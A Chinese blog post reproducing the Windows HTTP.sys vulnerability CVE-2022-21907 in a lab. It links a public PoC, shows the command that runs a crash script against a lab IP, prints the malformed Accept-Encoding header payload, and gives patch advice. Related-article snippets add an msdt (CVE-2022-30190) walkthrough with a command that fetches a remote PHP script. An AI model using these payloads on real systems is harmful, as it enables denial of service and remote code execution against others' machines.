CVE-2022-21907 Microsoft Windows HTTP 协议栈远程代码执行漏洞复现

最新推荐文章于 2024-09-03 07:45:58 发布
最新推荐文章于 2024-09-03 07:45:58 发布
阅读量2k 收藏 14
点赞数 3
分类专栏: 漏洞复现【Free】 文章标签: microsoft windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44281295/article/details/127605019
版权

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

0x05 环境搭建:

下载:

开启IIS:

0x06 漏洞复现:

利用POC:

0x07 流量分析:

客户端:

0x08 修复建议:

0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

        Microsoft Windows HTTP 协议栈(HTTP.sys)是Windows操作系统中处理HTTP请求的内核驱动程序,常见于Web浏览器与 Web 服务器之间的通信,,以及Internet Information Services (IIS)中。

        由于该漏洞危害极大且影响范围甚广,而目前官方已发布修复补丁,建议广大用户及时更新补丁,并且做好资产自查以及预防工作,以免遭受黑客攻击。

0x03 漏洞概述:

        Microsoft Windows HTTP 协议栈远程代码执行漏洞,漏洞编号为CVE-2022-21907,漏洞等级:严重,漏洞评分:9.8。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞。

0x04 影响版本:

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 for ARM64-based Systems

Windows 11 for x64-based Systems

Windows Server, version 20H2 (Server Core Installation)

Windows 10 Version 20H2 for ARM64-based Systems

Windows 10 Version 20H2 for 32-bit Systems

Windows 10 Version 20H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows 10 Version 21H1 for 32-bit Systems

Windows 10 Version 21H1 for ARM64-based Systems

Windows 10 Version 21H1 for x64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

0x05 环境搭建:

下载:

文件名:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso

BT链接:

magnet:?xt=urn:btih:38A3327AC2E4D57BA0E3ECC421588FA6B352C967&dn=cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso&xl=5424910336

开启IIS:

打开控制面板—启用关闭Windows功能—开启lnternet Information Services& Internet lnformation Services可承载的Web核心

0x06 漏洞复现:

利用POC:

https://github.com/p0dalirius/CVE-2022-21907-http.sys

Python CVE-2022-21907_http.sys_crash.py -t 192.168.16.132

0x07 流量分析:

客户端:

请求Accept-Encoding:

AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,

0x08 修复建议:

微软官方目前已修复该漏洞,并发布了相关安全补丁,建议用户尽快安装补丁。

下载链接:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907

Kang_Sec
关注
专栏目录
2022漏洞事件盘点
m0_60571990的博客
12-19 4603
2022漏洞事件盘点
Windows CVE-2022-21907漏洞复现
热门推荐
执着
01-20 1万+
测试环境:虚拟机Windows 10 Windows版本:cn_windows_10_consumer_editions_version_2004_updated_sep_2020_x64_dvd_049d70ee.iso 此次CVE漏洞是由于HTTP.sys的缓冲区溢出从而导致的拒绝服务,蓝屏重启。 微软官方在第一时间修复此漏洞,据微软官方公布的此次漏洞影响范围: Windows Server 2019 (Server Core installation) Windows Server 201..
HTTP.sys ms15-034 远程代码执行漏㓊(CVE-2015-1635)
qq_68163788的博客
06-28 1012
HTTP.sys ms15-034 远程代码执行漏洞CVE-2015-1635)是一种远程命令执行漏洞,允许攻击者通过发送特制的HTTP请求触发漏洞,从而在受影响的系统上执行恶意代码。这个漏洞Microsoft Windows中的HTTP服务模块(HTTP.sys)中被发现。漏洞影响了Windows 7、Windows 8、Windows 8.1、Windows Server 2008 R2、Windows Server 2012和Windows Server 2012 R2。漏洞允许攻击者在系统上执行
sys远程代码执行漏洞复现
qq_43398810的博客
02-22 1879
sys远程代码执行漏洞 目标靶机 服务器类型: 型号sever2008 R2 64位。 IP: 192.168.70.43 服务器类型 :web 中间件 : IIS 攻击者IP: 192.168.70.42(这里不需要用到) 机型: kali 这个漏洞也称ms15-034,能使服务器蓝屏重启,复现用的...
CVE-2022-21907 Windows HTTP拒绝服务漏洞复现
weixin_45715461的博客
06-29 3232
CVE-2022-21907 Windows HTTP拒绝服务漏洞复现
HTTP协议栈远程执行代码漏洞CVE-2021-31166
m0_49025459的博客
04-21 303
微软官方发布5月安全更新补丁,其中修复了一个HTTP协议栈远程代码执行漏洞CVE-2021-31166),该漏洞存在于Windows 10和Windows Server中的HTTP协议栈(http.sys)处理程序中。未授权的攻击者可以构造恶意请求包攻击目标服务器,成功利用该漏洞的攻击者可以在目标服务器执行任意代码,微软表示此漏洞可用于蠕虫式传播,影响十分广泛。
【转载】CVE-2022-21907 HTTP 协议栈拒绝服务/远程代码执行
苏落is菜鸡的博客
01-18 1206
CVE-2022-21907 HTTP 协议栈拒绝服务/远程代码执行
CVE-2021-31166 Windows HTTP协议栈远程代码执行漏洞复现
m0_56642842的博客
07-19 1379
0x00 简介 HTTP全称是Hyper Transfer protocol ,即超文本传输协议,当今普遍采用版本Http1.1,HTTP协议已属于应用层协议,它构建在TCP之上,处于TCP/IP架构的顶端,它是为Web浏览器与 Web 服务器之间的通信而设计的,Windows上的HTTP协议栈用于windows上的Web服务器,例如Internet Information Services(IIS)等,若该协议栈相关的组件存在漏洞,则可能导致远程恶意代码执行 0x01 漏洞概述 微软官方发布5月安全更新补
CVE-2021-31166 HTTP协议栈远程代码执行漏洞(详解图文教程)
weixin_51387754的博客
05-21 4435
漏洞名称 : HTTP协议栈远程代码执行漏洞CVE-2021-31166 组件名称 : HTTP.sys 影响范围 : Windows 10 Version 2004, 20H2 Windows Server version 2004, 20H2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:否 2、前置条件:受害主机启用了HTTP服务 3、触发方式:远程 综合评价 : <综合评定利用难度>:困难,在无需授权的情况下可以导致远程服务器拒绝服务,但是要实现代码执行
CVE-2021-31166 漏洞复现
miko's blog
10-25 1403
CVE-2021-31166漏洞复现漏洞导读漏洞版本漏洞复现总结 CVE-2021-31166 Exploit https://github.com/ConMiko/CVE-2021-31166-exploit 官方补丁 https://msrc.microsoft.com/update-guide/en-us/releaseNote/2021-May 漏洞导读 CVE-2021-31166 (HTTP Protocol Stack Remote Code Execution Vulnerabilit
CVE-2017-11780 windows高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞, 针对CVE-2017-11771的Windows Search远程代码执行漏洞
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 543
上一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
CVE-2021-35211: SolarWinds Serv-U SSH 漏洞分析
HBohan的博客
09-07 2544
SolarWinds发布安全公告,修复了Serv-U中存在的远程代码执行漏洞CVE-2021-35211),该漏洞为微软发现在野利用后向SolarWinds报告,并提供了漏洞利用的概念证明。未经身份验证的远程攻击者利用此漏洞可在受影响的服务器上以特殊权限执行任意代码,请相关用户尽快采取措施进行防护。 该漏洞存在于SSH协议中,与 SUNBURST 供应链攻击无关,仅影响SolarWinds Serv-U Managed File Transfer和Serv-U Secure FTP。使用Serv-U管理控
每日漏洞 | HTTP.sys远程代码执行
03-12 1803
每日漏洞 | HTTP.sys远程代码执行
推荐开源项目:CVE-2022-21907远程代码执行漏洞的验证工具
gitblog_00669的博客
08-28 243
推荐开源项目:CVE-2022-21907远程代码执行漏洞的验证工具 CVE-2022-21907HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2022-21907 在网络安全日益成为全球焦点的时代,每一个未被发现的系...
CVE-2022-21907安全漏洞利用及防护教程
最新发布
gitblog_00031的博客
09-03 410
#CVE-2022-21907安全漏洞利用及防护教程 CVE-2022-21907A REAL DoS exploit for CVE-2022-21907项目地址:https://gitcode.com/gh_mirrors/cve/CVE-2022-21907 项目介绍 本项目是针对CVE-2022-21907这一特定远程代码执行漏洞的Proof-of-Concept(PoC)实现。CVE...
网络安全基础之Windows漏洞复现 (MS08-067)
weixin_60888404的博客
06-03 2957
本次介绍Windows系统漏洞 MS08-087Windows Server服务 RPC 缓冲区远程溢出漏洞编号 MS08-067MS08_067漏洞渗透攻击原理其原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机前期准备: 靶机:Windows 2003 (未打补丁) 攻击机:kali LinuxMS08_067漏洞渗透攻击过程使用
网络安全 基础之 Windows漏洞复现 (MS17-010)永恒之蓝
weixin_60888404的博客
06-01 2391
Windows经典漏洞 永恒之蓝复现
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kang_Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值